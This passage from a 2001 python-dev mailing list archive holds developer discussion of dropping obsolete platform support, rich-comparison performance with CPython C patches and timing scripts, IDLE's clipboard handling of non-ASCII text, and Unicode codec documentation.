involved a process as PEP 4 or 5 -- it's a more reversable decision than removing a feature from the language. Although, removing a platform dependent feature -- like in the long discussion about case sensitivity -- may be a bigger deal. But I'm really thinking more about things like the Next case -- where there are build options and #ifdefs that, as far as we know, haven't been tested in several versions. ( Believe it or not, there are still folks hanging dearly onto their black NeXT cubes, and finding the useful -- but I have no idea if any of them are using Python, and there's lots of users out there whom we only hear from when they discover a problem. ) Perhaps there should be some sort of "Last Call for Platform Saviour" : if nobody steps forward who is willing to do test builds on that platform, support may be removed if maintaining it is getting in the way. Any thougts or opinions on this? Are there any other platforms where this might become an issue ? If this looks like it's unlikely to crop up again, then maybe we don't need to bother with a 'policy'. What about support for particular compilers and build environments: (Borland C on Windows and MPW on Mac are two examples of "minority" compilers.) BTW: As I've though more about this particular issue (--with-next-framework) I don't think it's as big an issue -- removing that switch isn't going to break the build entirely (I think!). Pulling out all of the #ifdefs for Next would be a larger issue, but that hasn't been proposed (yet). If the consensus is that this isn't a big enough issue, in general, to need an official policy, then I vote to pull it out and see if anyone screams. -- Steve Majewski From guido at digicool.com Mon May 14 22:53:26 2001 From: guido at digicool.com (Guido van Rossum) Date: Mon, 14 May 2001 15:53:26 -0500 Subject: [Python-Dev] deprecated platforms In-Reply-To: Your message of "Mon, 14 May 2001 13:04:56 -0400." References: Message-ID: <200105142053.PAA24202@cj20424-a.reston1.va.home.com> I can't really add much to this discussion, since I have *absolutely* *no* *idea* what kind of framework we're talking about here... I agree with Steve that we shouldn't be too scared of removing support for obsolete platforms. People hanging on to obsolete platforms may as well hang on to obsolete Python versions... --Guido van Rossum (home page: http://www.python.org/~guido/) From martin at loewis.home.cs.tu-berlin.de Mon May 14 21:40:21 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 14 May 2001 21:40:21 +0200 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: <15103.65486.61021.328424@beluga.mojam.com> (skip@pobox.com) References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com> <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> <15103.65486.61021.328424@beluga.mojam.com> Message-ID: <200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de> > Okay, so I'm completed confused now. I extended the definition of > ECTypeType to include this after the doc string slot: > > (traverseproc)0, /* tp_traverse */ > (inquiry)0, /* tp_clear */ > (richcmpfunc)0, /* rich comparisons */ > 0L, /* weak reference enabler */ > > #ifdef COUNT_ALLOCS > /* these must be last */ > 0, /* tp_alloc */ > 0, /* tp_free */ > 0, /* tp_maxalloc */ > (struct _typeobject *)0, /* tp_next */ > #endif Why did you do that? ECTypeType has the right data type (PyTypeObject). It is the instances of PyExtensionClass that are troubling > When I looked at the definition of ECType, after the doc string I saw > > METHOD_CHAIN(ExtensionClass_methods) > > as Martin indicated. I can't simply insert the same zeroes at the end of > the ECType def'n as I did at the end of the ECTypeType definition. Of course not. ECType is of type PyExtensionClass, not of type PyTypeObject. Those are similar, but not equal. > Where does this METHOD_CHAIN thing go? I looked at the def'n of > struct _typeobject in Include/object.h but didn't see a slot that > looked suitable. Just have a look at ExtensionClass.h instead. > FWIW, when I build Python and PyGtk with Py_DEBUG defined as Neil suggested, > I get > > Fatal Python error: UNREF invalid object > > when I run my failing script. This is with and without making any changes > to ECType or ECTypeType. BTW, what version of PyGtk did you try to compile? I've tried the 0.7.0-dont-use, and it can run examples/testgtk without major problems (the example did need some updates, since it is apparently outdated). My Gtk version was 1.2, on Linux. In any case, I think you need to analyse this in a debugger. Regards, Martin From tim at digicool.com Mon May 14 22:12:44 2001 From: tim at digicool.com (Tim Peters) Date: Mon, 14 May 2001 16:12:44 -0400 Subject: [Python-Dev] Comparison speed Message-ID: Here's a simple test program: from time import clock indices = [1] * 100000 def doit(): s = clock() i = 0 while i < 100000: "ab" < "cd" i += 1 f = clock() return f - s for i in xrange(10): print "%.3f" % doit() And here's output from 2.0, 2.1 and current CVS: C:\Code\python\dist\src\PCbuild>\python20\python timech.py 0.107 0.106 0.109 0.106 0.106 0.106 0.106 0.106 0.105 0.106 C:\Code\python\dist\src\PCbuild>\python21\python timech.py 0.118 0.118 0.117 0.118 0.117 0.118 0.117 0.118 0.117 0.118 C:\Code\python\dist\src\PCbuild>python timech.py 0.119 0.117 0.118 0.117 0.118 0.117 0.118 0.117 0.118 So "something happened" between 2.0 and 2.1 to slow this overall by 10%. string_compare hasn't changed, so rich comparisons are a good guess. Note that the more obvious timing loop obscures the issue: def doit(): s = clock() for i in indices: "ab" < "cd" f = clock() return f - s C:\Code\python\dist\src\PCbuild>\python20\python timech.py 0.070 0.069 0.069 0.070 0.069 0.069 0.069 0.070 0.069 0.069 C:\Code\python\dist\src\PCbuild>\python21\python timech.py 0.076 0.076 0.076 0.076 0.076 0.077 0.076 0.076 0.076 0.076 C:\Code\python\dist\src\PCbuild>python timech.py 0.069 0.070 0.070 0.069 0.069 0.070 0.070 0.069 0.070 0.069 for-loops are faster in current CVS than in 2.0 or 2.1, and that cancels out the comparison slowdown. If we try it with a type of comparison that avoids the richcmp machinery (int < int is special-cased in ceval), current CVS is actually faster than 2.0: def doit(): s = clock() for i in indices: 2 < 3 f = clock() return f - s C:\Code\python\dist\src\PCbuild>\python20\python timech.py 0.056 0.056 0.056 0.056 0.055 0.056 0.058 0.058 0.055 0.056 C:\Code\python\dist\src\PCbuild>\python21\python timech.py 0.059 0.059 0.059 0.060 0.060 0.059 0.059 0.060 0.059 0.059 C:\Code\python\dist\src\PCbuild>python timech.py 0.053 0.052 0.052 0.053 0.053 0.052 0.052 0.054 0.052 0.053 C:\Code\python\dist\src\PCbuild> This also shows that 2.1 was a bit more slothful than 2.0 for some reason other than richcmps. These were all done on a Win2K box; timings vary too much on a Win9x box to be useful. Anybody care to take a stab at making the new richcmp and/or coerce code ugly again? speed-isn't-pretty-but-then-guts-rarely-are-ly y'rs - tim From martin at loewis.home.cs.tu-berlin.de Mon May 14 22:34:35 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 14 May 2001 22:34:35 +0200 Subject: [Python-Dev] deprecated platforms Message-ID: <200105142034.f4EKYZs05805@mira.informatik.hu-berlin.de> > I'm all for removing it: So am I. There are way too many build options for build Python on the Mac-like systems already (e.g. after that change, you still have --with-dyld - or rather the option of still building .o extensions). If it is clearly broken (even if only on OSX), it should be removed. Anybody interested in the flag would need to make it work correctly before it can be revived. > However, I said I thought there ought to be some sort of official > procedure for removing platform support. I don't think such a procedure is necessary. It is not that any end user would be concerned; building Python is an activity of system administrators. The other PEPs are there because changing the language or removing modules might break *applications* that used to work after an upgrade of Python. With removed platform support, nothing will break - installations would continue to use the last release that did support that platform. Regards, Martin From martin at loewis.home.cs.tu-berlin.de Tue May 15 00:06:57 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Tue, 15 May 2001 00:06:57 +0200 Subject: [Python-Dev] Comparison speed Message-ID: <200105142206.f4EM6vZ09790@mira.informatik.hu-berlin.de> > Anybody care to take a stab at making the new richcmp and/or coerce > code ugly again? When stepping through the code, I also missed support for the relationship between identity and equality. E.g. in PyObject_RichCompare, I'd expect if (v == w) { switch (op) case Py_EQ:case Py_LE:case Py_GE: Py_INCREF(Py_True); return Py_True; case Py_NE:case Py_LT:case Py_GT: Py_INCREF(Py_False); return Py_False; } } That would not help in your case, of course. I don't even know how frequent comparing identical objects is in real life - but this is something that PyObject_Compare has that PyObject_RichCompare currently doesn't. Regards, Martin From martin at loewis.home.cs.tu-berlin.de Mon May 14 23:55:39 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 14 May 2001 23:55:39 +0200 Subject: [Python-Dev] Comparison speed Message-ID: <200105142155.f4ELtdM09420@mira.informatik.hu-berlin.de> > Anybody care to take a stab at making the new richcmp and/or coerce > code ugly again? Hi Tim, With CVS Python, 1000000 iterations, and a for loop, I currently got 0.780 0.770 0.770 0.780 0.770 0.770 0.770 0.780 0.770 0.770 With the patch below, I get 0.720 0.710 0.710 0.720 0.710 0.710 0.710 0.720 0.710 0.710 The idea is to let strings support richcmp; this also allows some optimization for the EQ case. Please let me know what you think. Martin Index: stringobject.c =================================================================== RCS file: /cvsroot/python/python/dist/src/Objects/stringobject.c,v retrieving revision 2.115 diff -u -r2.115 stringobject.c --- stringobject.c 2001/05/10 00:32:57 2.115 +++ stringobject.c 2001/05/14 21:36:36 @@ -596,6 +596,51 @@ return (len_a < len_b) ? -1 : (len_a > len_b) ? 1 : 0; } +/* In the signature, only a is guaranteed to be a PyStringObject. + However, as the first thing in the function, we check that b + is of that type also. */ + +static PyObject* +string_richcompare(PyStringObject *a, PyStringObject *b, int op) +{ + int c; + PyObject *result; + if (!PyString_Check(b)) { + result = Py_NotImplemented; + goto out; + } + if (op == Py_EQ) { + if (a->ob_size != b->ob_size) { + result = Py_False; + goto out; + } +#ifdef CACHE_HASH + if (a->ob_shash != b->ob_shash + && a->ob_shash != -1 + && b->ob_shash != -1) { + result = Py_False; + goto out; + } +#endif + } + c = string_compare(a, b); + switch (op) { + case Py_LT: c = c < 0; break; + case Py_LE: c = c <= 0; break; + case Py_EQ: c = c == 0; break; + case Py_NE: c = c != 0; break; + case Py_GT: c = c > 0; break; + case Py_GE: c = c >= 0; break; + default: + result = Py_NotImplemented; + goto out; + } + result = c ? Py_True : Py_False; + out: + Py_INCREF(result); + return result; +} + static long string_hash(PyStringObject *a) { @@ -2409,6 +2454,12 @@ &string_as_buffer, /*tp_as_buffer*/ Py_TPFLAGS_DEFAULT, /*tp_flags*/ 0, /*tp_doc*/ + 0, /*tp_traverse*/ + 0, /*tp_clear*/ + (richcmpfunc)string_richcompare, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + 0, /*tp_iter*/ + 0, /*tp_iternext*/ }; void From gstein at lyra.org Tue May 15 00:17:56 2001 From: gstein at lyra.org (Greg Stein) Date: Mon, 14 May 2001 15:17:56 -0700 Subject: [Python-Dev] Comparison speed In-Reply-To: ; from tim@digicool.com on Mon, May 14, 2001 at 04:12:44PM -0400 References: Message-ID: <20010514151755.P1374@lyra.org> On Mon, May 14, 2001 at 04:12:44PM -0400, Tim Peters wrote: >... > Anybody care to take a stab at making the new richcmp and/or coerce code > ugly again? > > speed-isn't-pretty-but-then-guts-rarely-are-ly y'rs - tim Euh... isn't Guido's preference for cleanliness over speed? Cheers, -g -- Greg Stein, http://www.lyra.org/ From tim at digicool.com Tue May 15 00:35:33 2001 From: tim at digicool.com (Tim Peters) Date: Mon, 14 May 2001 18:35:33 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <20010514151755.P1374@lyra.org> Message-ID: [Greg Stein] > Euh... isn't Guido's preference for cleanliness over speed? So do both. From greg at cosc.canterbury.ac.nz Tue May 15 03:42:49 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Tue, 15 May 2001 13:42:49 +1200 (NZST) Subject: [Python-Dev] Comparison speed In-Reply-To: <200105142206.f4EM6vZ09790@mira.informatik.hu-berlin.de> Message-ID: <200105150142.NAA18195@s454.cosc.canterbury.ac.nz> "Martin v. Loewis" : > I also missed support for the > relationship between identity and equality. That would severely restrict the semantics that could be given to the comparison operators by overloading them. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From guido at digicool.com Tue May 15 04:40:33 2001 From: guido at digicool.com (Guido van Rossum) Date: Mon, 14 May 2001 21:40:33 -0500 Subject: [Python-Dev] Comparison speed In-Reply-To: Your message of "Mon, 14 May 2001 15:17:56 MST." <20010514151755.P1374@lyra.org> References: <20010514151755.P1374@lyra.org> Message-ID: <200105150240.VAA26417@cj20424-a.reston1.va.home.com> > > speed-isn't-pretty-but-then-guts-rarely-are-ly y'rs - tim > > Euh... isn't Guido's preference for cleanliness over speed? Yeah, Tim & I have developed a nice good-cop-bad-cop routine about this. :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Tue May 15 05:36:42 2001 From: tim.one at home.com (Tim Peters) Date: Mon, 14 May 2001 23:36:42 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105142206.f4EM6vZ09790@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis] > ... > When stepping through the code, I also missed support for the > relationship between identity and equality. E.g. in > PyObject_RichCompare, I'd expect > > if (v == w) { > switch (op) > case Py_EQ:case Py_LE:case Py_GE: > Py_INCREF(Py_True); > return Py_True; > case Py_NE:case Py_LT:case Py_GT: > Py_INCREF(Py_False); > return Py_False; > } > } > > That would not help in your case, of course. I don't even know how > frequent comparing identical objects is in real life - but this is > something that PyObject_Compare has that PyObject_RichCompare > currently doesn't. Guido insisted (with cause ) on these four pairs as being equivalent: x < y iff y > x x <= y y >= x x == y y == x x != y y != x but beyond that, in the presence of rich comparisons, agreed not to make any other assumptions about what those pixel-bags "mean". In particular, there's no implication that "x <= y" iff "x < y or x == y", or that "x < y" implies "x != y", etc. Applying that to the above leaves you with nothing but if (v == w && op == Py_EQ) /* then return Py_True */ Which is about all PyObject_Compare's if (v == w) return 0; assumes too. So I don't see much future in that. [later, a patch to fill in the richcmp slot for strings] > +static PyObject* > +string_richcompare(PyStringObject *a, PyStringObject *b, int op) > +{ > + int c; > + PyObject *result; > + if (!PyString_Check(b)) { > + result = Py_NotImplemented; > + goto out; > + } > + if (op == Py_EQ) { > + if (a->ob_size != b->ob_size) { > + result = Py_False; > + goto out; > + } > +#ifdef CACHE_HASH > + if (a->ob_shash != b->ob_shash > + && a->ob_shash != -1 > + && b->ob_shash != -1) { > + result = Py_False; > + goto out; > + } > +#endif > + } > + c = string_compare(a, b); > + switch (op) { > + case Py_LT: c = c < 0; break; > + case Py_LE: c = c <= 0; break; > + case Py_EQ: c = c == 0; break; > + case Py_NE: c = c != 0; break; > + case Py_GT: c = c > 0; break; > + case Py_GE: c = c >= 0; break; > + default: > + result = Py_NotImplemented; > + goto out; > + } > + result = c ? Py_True : Py_False; > + out: > + Py_INCREF(result); > + return result; [and that yields about an 8% speedup in the "<" case] That looks on the right track, but maybe at the wrong level: why is it necessary? That is, the bulk of the "smarts" here in the switch stmt are type-independent: if there's no specific implementation of individual comparisons, but there is a tp_compare, then the switch stmt applies verbatim to *any* such type. Do we have to fill in the richcmp slot for everything to get Python to realize that? I mean "just about everything", too: while, e.g., ceval special-cases "<" for ints, that doesn't do sorting or max or min etc on ints a lick of good (they don't go thru the COMPARE_OP opcode then, but thru the general comparison routines). The "speed problem" appears to be: + COMPARE_OP calls cmp_outcome() + which calls PyObject_RichCompare() + which calls do_richcmp() + which calls try_rich_compare() (unsuccessfully now, successfully after your patch) which fails to find a richcmp slot on either operand (now) so says "not implemented" + then calls try_3way_to_rich_compare() + which calls try_3way_compare() + which finally calls the tp_compare slot + then runs exactly the same switch (op) { case Py_LT: c = c < 0; break; case Py_LE: c = c <= 0; break; case Py_EQ: c = c == 0; break; case Py_NE: c = c != 0; break; case Py_GT: c = c > 0; break; case Py_GE: c = c >= 0; break; } result = c ? Py_True : Py_False; switch as your patch and things unwind. So we've got 7 function calls there, not even counting calls to PyErr_Occurred() and PyObject_IsTrue(), all to find about 3 machine instructions that actually do the compare . You got an 8% speedup for one type by tricking the switch stmt into appearing 3 calls earlier. What if the implementation were smarter, and did it for *all* relevant types even a call or two before that? I don't see any reason "in principle" that compares couldn't be much faster, and via the usual gimmicks: bigger, smarter functions that remember what they've already determined so don't need to figure it out over and over again, and fast paths to favor common cases at the expense of comparisons from Mars. One thing to note here: the workhorse comparisons are "like strings" in having no *logical* need for richcmps at all; and the objects for which richcmps were introduced were numerical arrays, which can much better afford a longer code path to *find* them (one matrix compare will trigger many vanilla element compares anyway, so even for arrays it's much more important that the *latter* be fast). The code now is approximately backwards in that respect (it takes gobs of work before we even *look* for a cmp now -- indeed, if a type has both cmp and richcmp slots now, and we're doing an explict "cmp" compare, the code now tries to *simulate* cmp first via a long sequence of richcmp calls!). I don't have time to uglify this code, but Python would benefit from it. and-no-matter-what-guido-may-say-ly y'rs - tim From tim.one at home.com Tue May 15 05:50:00 2001 From: tim.one at home.com (Tim Peters) Date: Mon, 14 May 2001 23:50:00 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4 In-Reply-To: Message-ID: [Guido] > Index: spam.c > ... Congratulations! "My other" ISP (MSN) just started tagging suspected spam with "spam" in the subject line, and my mail reader moves that to a special spam folder upon delivery. So far this is the one and only incoming email it's moved. Many solicitations to help foreign nationals move large sums of money out of their country have gotten through, along with a number of intriguing promises that I can easily increase the size of my penis -- like I have any need for either of those . reads-every-spam-he-gets-top-to-bottom-ly y'rs - tim From esr at thyrsus.com Tue May 15 05:53:38 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Mon, 14 May 2001 23:53:38 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4 In-Reply-To: ; from tim.one@home.com on Mon, May 14, 2001 at 11:50:00PM -0400 References: Message-ID: <20010514235338.C663@thyrsus.com> Tim Peters : > Many solicitations to help foreign nationals move large sums of > money out of their country have gotten through, along with a number of > intriguing promises that I can easily increase the size of my penis -- like I > have any need for either of those . What we should truly fear is the prospect that you might increase the size of your . -- Eric S. Raymond "The state calls its own violence `law', but that of the individual `crime'" -- Max Stirner From uche.ogbuji at fourthought.com Tue May 15 06:26:31 2001 From: uche.ogbuji at fourthought.com (Uche Ogbuji) Date: Mon, 14 May 2001 22:26:31 -0600 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4 In-Reply-To: Message from "Tim Peters" of "Mon, 14 May 2001 23:50:00 EDT." Message-ID: <200105150426.f4F4QVx01531@localhost.local> > [Guido] > > Index: spam.c > > ... > > Congratulations! "My other" ISP (MSN) just started tagging suspected spam > with "spam" in the subject line, and my mail reader moves that to a special > spam folder upon delivery. So far this is the one and only incoming email > it's moved. Many solicitations to help foreign nationals move large sums of > money out of their country have gotten through [...] I thought I was th only one getting all these silly Nigerian scam spams. I figured maybe they saw my name and decided to test on me (though they might more cleverly have figured that a fellow Nigerian would be wise to the game). However, with the (sloppily) bogus headers I've always found on those things, I'm surprised your ISP couldn't sniff them out. Not that it matters. The Eastern Nigerian proverb gets it right. "Once hunters learn to shoot without missing, birds will learn to fly without resting". -- Uche Ogbuji Principal Consultant uche.ogbuji at fourthought.com +1 303 583 9900 x 101 Fourthought, Inc. http://Fourthought.com 4735 East Walnut St, Ste. C, Boulder, CO 80301-2537, USA Software-engineering, knowledge-management, XML, CORBA, Linux, Python From tim.one at home.com Tue May 15 08:28:34 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 15 May 2001 02:28:34 -0400 Subject: [Python-Dev] IDLE and non-ASCII characters In-Reply-To: <200105141141.NAA22376@pandora.informatik.hu-berlin.de> Message-ID: [Guido] > Postscript: using cut and paste, I *can* enter "s='??'" in IDLE at the > Python prompt, both on Linux and on Windows 98. It prints as > '\xe4\xf6' on both systems. What changed? [Martin] > Perhaps the Tcl version? That sounds like the issue that Marc talked > about: Tk behaves differently when text is entered programmatically > (and perhaps through cut-n-paste), as compared to text entered through > the keyboard. Using cut-n-paste with Tk 8.3.1, CVS python, X11R6.3 on > Solaris 8 still gives me the UnicodeError. I don't know which version of Python Guido used. I tried cut-&-paste of s='??' from his email into the distributed 2.1 IDLE under Win98, and got UnicodeError: ASCII encoding error: ordinal not in range(128) Tk appears to interfere with using the usual Windows ALT+0nnn method of entering funny characters, so unsure what happens then -- but for me it either works fine or does something insane (moves the cursor to the left margin, brings up an IDLE dialog box, etc). If I open the system Character Map utility and copy-&-paste using *that*, I can enter all sorts of stuff without problem: >>> s = "?????????????????????????????????" >>> s '\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef \xf0\xf1\xf2\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' >>> So not all clipboard entries are created equal. Another clue: if I paste the s='??' snippet from Guido's email into a file opened with Notepad, then immediately copy it again from the Notepad doc, then paste that into Idle, again no problem: >>> s='??' >>> s '\xe4\xf6' >>> Using a clipboard diagnostic tool I don't understand, when I copy from Notepad these data formats are in the system clipboard: TEXT LOCALE OEMTEXT But when I copy from Guido's email under Outlook 2000, it's DataObject Rich Text Format Rich Text Format Without Objects RTF as Text TEXT UNICODTEXT Ole Private Data LOCALE OEMTEXT Under Character Map, it's Rich Text Format TEXT LOCALE OEMTEXT So perhaps it's not the version of Tk but the source of the data, and that Tk grabs an unfortunate data format (when present) from the clipboard in preference to a fortunate one. the-clipboard-is-a-complex-beast-ly y'rs - tim From martin at loewis.home.cs.tu-berlin.de Tue May 15 08:44:23 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Tue, 15 May 2001 08:44:23 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105150644.f4F6iN501475@mira.informatik.hu-berlin.de> > Applying that to the above leaves you with nothing but > > if (v == w && op == Py_EQ) /* then return Py_True */ > > [...] So I don't see much future in that. Is this really exactly what Python would guarantee? I'm surprised that x==x would always be true, but x!=x might be true also. In a type where x!=x holds, wouldn't people also want to say that x==x might fail? IOW, I had expected that you'd reduced it to if (v == w && op == Py_EQ) /* then return Py_True */ if (v == w && op == Py_NE) /* then return Py_False */ The one application where this may help is list_contains, in particular when searching a list of interned strings. > You got an 8% speedup for one type by tricking the switch stmt into > appearing 3 calls earlier. What if the implementation were smarter, > and did it for *all* relevant types even a call or two before that? Please have a look at the patch below. Since I made a CVS update since yesterday, I had to readjust the baseline results: 0.790 0.780 0.770 0.780 0.780 0.790 0.780 0.790 0.790 0.790 The patch moves the case "equal types, supporting cmp" to somewhat earlier, just after the attempt to do richcompare. Now I get 0.760 0.770 0.750 0.770 0.750 0.750 0.760 0.760 0.760 0.760 So while there is some saving, this is not as good as implementing richcompare. > I don't see any reason "in principle" that compares couldn't be much > faster, and via the usual gimmicks: bigger, smarter functions that > remember what they've already determined so don't need to figure it > out over and over again, and fast paths to favor common cases at the > expense of comparisons from Mars. I agree "in principle" :-) However, you cannot move the case "equal types, implementing tp_compare" before the case "one of them implements tp_richcompare" without changing the semantics. The change here is what you'd do when you have both richcmp and oldcomp; Python clearly mandates using richcmp. In case this is not obvious (it wasn't to me): UserList will complain about using the deprecated __cmp__, and dictionaries will iterate over their elements differently. Given that richcomp has to be tried first, this patch does the "common case" at the earliest possible time, and with no overhead, except for PyErr_Occurred call. So yes, compares can be much faster, BUT YOU HAVE TO SUPPORT TP_RICHCOMPARE (sorry for shouting). If you think the extra work for type implementors is not acceptable, we can offer a convenience function that everybody implementing tp_compare can put into tp_richcompare. For strings, I would still special-case tp_richcompare: when tracing calls to string_richcompare, I found that most calls with Py_EQ can be decided by checking that the string lengths are not equal. This is all "bigger, faster functions" put to work. Regards, Martin Index: object.c =================================================================== RCS file: /cvsroot/python/python/dist/src/Objects/object.c,v retrieving revision 2.131 diff -u -r2.131 object.c --- object.c 2001/05/11 03:36:45 2.131 +++ object.c 2001/05/15 06:16:53 @@ -477,16 +477,6 @@ if (PyInstance_Check(w)) return (*w->ob_type->tp_compare)(v, w); - /* If the types are equal, don't bother with coercions etc. */ - if (v->ob_type == w->ob_type) { - if ((f = v->ob_type->tp_compare) == NULL) - return 2; - c = (*f)(v, w); - if (PyErr_Occurred()) - return -2; - return c < 0 ? -1 : c > 0 ? 1 : 0; - } - /* Try coercion; if it fails, give up */ c = PyNumber_CoerceEx(&v, &w); if (c < 0) @@ -590,15 +580,21 @@ -1 if v < w; 0 if v == w; 1 if v > w; + If the object implements a tp_compare function, it returns + whatever this function returns (whether with an exception or not). */ static int do_cmp(PyObject *v, PyObject *w) { int c; + cmpfunc f; c = try_rich_to_3way_compare(v, w); if (c < 2) return c; + if (v->ob_type == w->ob_type + && (f = v->ob_type->tp_compare) != NULL) + return (*f)(v, w); c = try_3way_compare(v, w); if (c < 2) return c; @@ -760,16 +756,9 @@ } static PyObject * -try_3way_to_rich_compare(PyObject *v, PyObject *w, int op) +convert_3way_to_object(int op, int c) { - int c; PyObject *result; - - c = try_3way_compare(v, w); - if (c >= 2) - c = default_3way_compare(v, w); - if (c <= -2) - return NULL; switch (op) { case Py_LT: c = c < 0; break; case Py_LE: c = c <= 0; break; @@ -782,16 +771,46 @@ Py_INCREF(result); return result; } + static PyObject * +try_3way_to_rich_compare(PyObject *v, PyObject *w, int op) +{ + int c; + + c = try_3way_compare(v, w); + if (c >= 2) + c = default_3way_compare(v, w); + if (c <= -2) + return NULL; + return convert_3way_to_object(op, c); +} + +static PyObject * do_richcmp(PyObject *v, PyObject *w, int op) { PyObject *res; + cmpfunc f; + res = try_rich_compare(v, w, op); if (res != Py_NotImplemented) return res; Py_DECREF(res); + + /* If the types are equal, don't bother with coercions etc. + Instances are special-cased in try_3way_compare, since + a result of 2 does *not* mean one value being greater + than the other. */ + if (v->ob_type == w->ob_type + && !PyInstance_Check(v) + && (f = v->ob_type->tp_compare) != NULL) { + int c; + c = (*f)(v, w); + if (PyErr_Occurred()) + return NULL; + return convert_3way_to_object(op, c); + } return try_3way_to_rich_compare(v, w, op); } From tim.one at home.com Tue May 15 09:33:06 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 15 May 2001 03:33:06 -0400 Subject: [Python-Dev] Unicode docs In-Reply-To: <3AFFA23F.248517E3@lemburg.com> Message-ID: I don't know that the Unicode docs need massive work, but the docs that are there simply don't answer the technical questions people have: they're too thin. Let's keep it simple. Contrast the Library manual's: unicode(string[, encoding[, errors]]) Decodes string using the codec for encoding. Error handling is done according to errors. The default behavior is to decode UTF-8 in strict mode, meaning that encoding errors raise ValueError. See also the codecs module. with Andrew's description (from http://www.amk.ca/python/2.0/): unicode(string [, encoding] [, errors]) Creates a Unicode string from an 8-bit string. encoding is a string naming the encoding to use. The errors parameter specifies the treatment of characters that are invalid for the current encoding; passing 'strict' as the value causes an exception to be raised on any encoding error, while 'ignore' causes errors to be silently ignored and 'replace' uses U+FFFD, the official replacement character, in case of any problems. The latter addresses several *fundamental* questions untouched by the former, like whar are the datatypes of the arguments and the result, what values does errors accept, and what do they mean? The first blurb answers some more, like what's the default encoding, and which exception is raised? Neither is complete on its own, but the reference manual should have a complete answer to all such questions. It doesn't have to go on at great length. A round-trip example would be invaluable. If Fred wanted to incorporate a brief overview too, a light rework of Andrew/Moshe's writeup would be an excellent start. From tim.one at home.com Tue May 15 09:47:16 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 15 May 2001 03:47:16 -0400 Subject: [Python-Dev] RE: Ill-defined encoding for CP875? In-Reply-To: <3AFF9F1B.A1CDD617@lemburg.com> Message-ID: [M.-A. Lemburg] > The problem is: which part would raise the exception -- the > encoder or the decoder ? Since I don't yet use any of this stuff for real, I have no idea: seems mostly a question of pragmatics, and I don't have any feel for how cp875 users would view it. > Here are some more options: > > * sort the items before creating the encoding table from the > decoding one (makes the mapping stable) If users don't care that round-trip can fail silently, fine. > * map keys which have multiple mappings in the encoding table > to None -- this causes their usage to raise an exception > (undefined mapping) If users don't care that they'll get an exception when they try something that can't be round-tripped, fine. Or would this depend on the value of the "errors" argument too? Then it's easier to impose. There's a theme here : I have no idea how important roundtrip is in Unicode Practice, or even that it's a constant across apps and encodings. If I write a codec to map all ASCII consonants to u"k" and vowels to u"a", I wouldn't care that I can't get "love" back from u"kaka" . From mal at lemburg.com Tue May 15 10:19:06 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Tue, 15 May 2001 10:19:06 +0200 Subject: [Python-Dev] Unicode docs References: Message-ID: <3B00E67A.C5769082@lemburg.com> Tim Peters wrote: > > I don't know that the Unicode docs need massive work, but the docs that are > there simply don't answer the technical questions people have: they're too > thin. As much as I would like to work on this, I simply don't have the time... if someone wants to contribute more detailed docs, though, I'd be glad to review them and answer remaining questions. Note that I will give a talk at the upcoming Bordeaux conference about Python and Unicode. The slides will eventually go online after the conference (in July). BTW, are any python-devs attending the conference (they have some great wine in that part of France ;-) ? -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Tue May 15 10:32:14 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Tue, 15 May 2001 10:32:14 +0200 Subject: [Python-Dev] RE: Ill-defined encoding for CP875? References: Message-ID: <3B00E98E.1C44FF5@lemburg.com> Tim Peters wrote: > > [M.-A. Lemburg] > > The problem is: which part would raise the exception -- the > > encoder or the decoder ? > > Since I don't yet use any of this stuff for real, I have no idea: seems > mostly a question of pragmatics, and I don't have any feel for how cp875 > users would view it. If there are any... that code page dates back to 1996 and is based in the EBCDIC world. > > Here are some more options: > > > > * sort the items before creating the encoding table from the > > decoding one (makes the mapping stable) > > If users don't care that round-trip can fail silently, fine. > > > * map keys which have multiple mappings in the encoding table > > to None -- this causes their usage to raise an exception > > (undefined mapping) > > If users don't care that they'll get an exception when they try something > that can't be round-tripped, fine. Or would this depend on the value of the > "errors" argument too? Then it's easier to impose. The errors argument tells the codecs what to do in case a mapping fails (from codecs.py): The .encode()/.decode() methods may implement different error handling schemes by providing the errors argument. These string values are defined: 'strict' - raise a ValueError error (or a subclass) 'ignore' - ignore the character and continue with the next 'replace' - replace with a suitable replacement character; Python will use the official U+FFFD REPLACEMENT CHARACTER for the builtin Unicode codecs. 'strict' is the default for all operations that deal 